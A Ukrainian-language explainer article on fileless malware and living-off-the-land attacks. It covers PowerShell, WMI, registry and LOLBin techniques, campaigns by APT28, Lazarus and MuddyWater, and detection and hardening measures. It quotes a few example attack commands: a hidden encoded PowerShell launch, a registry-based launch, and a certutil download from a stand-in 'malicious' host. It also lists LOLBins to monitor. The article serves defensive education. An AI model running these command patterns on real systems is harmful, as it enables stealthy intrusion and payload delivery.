root Fileless Malware та Living-off-the-Land (LOTL): повний гайд, механізми, техніки та реальні атаки
Fileless malware (безфайлове шкідливе ПЗ) та LOTL (Living-off-the-Land) — це одна з найнебезпечніших категорій сучасних кібератак. На відміну від класичних вірусів, які потребують завантаження файлів на диск, fileless-атаки працюють у пам’яті, використовують вбудовані системні інструменти Windows/macOS/Linux та майже не залишають слідів. Через це вони надзвичайно складні для виявлення та можуть непомітно діяти місяцями.
У статті детально розглянемо:
- Що таке fileless malware
- Як працює LOTL
- Типові техніки: PowerShell, WMI, Registry, LOLBins
- Чому антивіруси «не бачать» такі атаки
- Fileless під час APT-кампаній (APT28, Lazarus, MuddyWater)
- Топ реальних кейсів
- Методи захисту, виявлення та моніторингу
1. Що таке Fileless Malware?
Fileless malware — це шкідливе ПЗ, яке:
- не записує шкідливий виконуваний файл на диск;
- працює виключно в оперативній пам’яті (RAM);
- активно використовує легітимні інструменти системи;
- залишає мінімум артефактів після перезавантаження;
- обходить традиційні антивіруси, що сканують файли.
Основна мета — зробити активність максимально схожою на поведінку легальних системних процесів.
Відомий приклад: fileless-виконання PowerShell команд через WMI Events, коли шкідливий код зберігають у WMI-класах, а тригер викликає виконання при певній події.
2. LOTL — Living-off-the-Land: атаки через легітимні інструменти
LOTL-атаки використовують не власні шкідливі програми, а інструменти, що вже є в системі:
- PowerShell
- WMI (Windows Management Instrumentation)
- MSHTA.exe
- Rundll32.exe
- Regsvr32.exe
- Bitsadmin.exe
- Certutil.exe
- Cmd.exe / wmic.exe
Ці програми називають LOLBins (Living-off-the-Land Binaries).
Суть LOTL: використовувати штатні компоненти OS як троянського коня, щоб уникнути детекції.
3. Типові техніки fileless та LOTL атак
3.1. PowerShell як головний інструмент атак
PowerShell дозволяє:
- завантажувати payload у RAM через Base64;
- обходити політики виконання;
- створювати бездискові бекдори;
- робити reconnaissance («розвідку» в мережі);
- виконувати шифровані команди.
Приклад fileless запуску:
powershell.exe -nop -w hidden -EncodedCommand JAB...Payload ніколи не потрапляє на диск.
3.2. Використання WMI
WMI використовується для:
- збереження payload у WMI repository;
- створення persistence через WMI Event Subscriptions;
- виконання команд на дистанційних пристроях.
Це дуже важко виявити без спеціальних інструментів.
3.3. Registry-based malware
Шкідливий код може:
- зберігатися у Registry як Base64/powershell об’єкт
- декодуватися прямо в RAM
- виконуватися без створення файлів
Приклад запуску з реєстру:
powershell.exe (Get-Item "HKCU:\Software\Microsoft\Windows\Run").Value3.4. LOLBins
LOLBins — легітимні системні виконувані файли, які можуть використовуватися для атаки. Класичні:
- rundll32.exe — запуск DLL або JavaScript коду
- mshta.exe — виконання JS/HTA-вебскриптів
- certutil.exe — завантаження файлів, кодування
- wmic.exe — виконання злочинних WMI-команд
- regsvr32.exe — запуск скриптів з інтернету
Приклад завантаження шкідливого скрипта через certutil:
certutil.exe -urlcache -split -f http://malicious/payload.ps14. Чому Fileless та LOTL важко виявити?
Причини:
- немає файлів → антивірус не бачить загрозу
- використовуються довірені процеси Windows
- шкідливі команди можуть бути зашифровані (Base64)
- активність виглядає як легітимна адміністративна робота
- payload живе тільки у пам’яті
LOTL-атака майже невідрізнена від роботи системного адміністратора.
5. Fileless атаки у реальних APT-кампаніях
5.1. APT28 (Fancy Bear)
Використовували:
- PowerShell fileless бекдори
- WMI persistence
- фішинг для запуску in-memory команд
5.2. Lazarus Group
Використовували:
- fileless loader у Registry
- LOLBins для lateral movement
- mshta.exe для виконання JS бекдорів
5.3. MuddyWater
Відомі fileless техніки:
- PowerShell in-memory loaders
- WinRM для віддаленого виконання
- WMI events для збереження доступу
6. Топ реальних атак Fileless та LOTL
1. Astaroth Malware (Латинська Америка)
Атака, що використовувала:
- WMIC
- bitsadmin
- certutil
Жодного EXE — лише вбудовані утиліти.
2. PowerShell Empire атаки
Fileless persistence через:
- Registry
- Schedule Tasks
- WMI Subscriptions
3. FIN7 атаки на банки
Використання mshta.exe та rundll32.exe для запуску шкідливих JavaScript payload.
4. SamSam ransomware
Поширення через PowerShell + PSExec без файлів.
7. Методи виявлення та захисту від fileless атак
7.1. Моніторинг PowerShell
- ввімкнути PowerShell logging
- записувати Base64 команди
- забороняти старі версії PowerShell
7.2. Контроль WMI активності
- логувати створення WMI-подій
- виявляти підозрілі підписки
7.3. Захист Registry
- монітор ключових hive-ів
- alerts на появу незвичних Base64 payload
7.4. Виявлення LOLBins
Потрібно моніторити виконання:
- rundll32.exe
- mshta.exe
- wmic.exe
- certutil.exe
- bitsadmin.exe
7.5. EDR-рішення
- CrowdStrike Falcon
- SentinelOne
- Microsoft Defender ATP
- Elastic Security
Вони відслідковують поведінку процесів, а не файли.
8. Захист від LOTL у корпоративному середовищі
- обмежити PowerShell до версії 5+ (з безпековими політиками)
- відключити WMIC (застарілий та небезпечний)
- використовувати AppLocker / WDAC для блокування LOLBins
- мінімальні права доступу
- мережевий ізоляційний контроль
Висновок
Fileless malware та LOTL-атаки — це одна з найскладніших форм сучасної кіберзлочинності. Вони маскуються під легітимні інструменти, не використовують файлів і працюють безпосередньо у пам’яті, що робить їх практично невидимими для класичних антивірусів.
Для захисту потрібен не антивірус, а комплексний підхід: логування, EDR, контроль системних інструментів та моніторинг поведінки.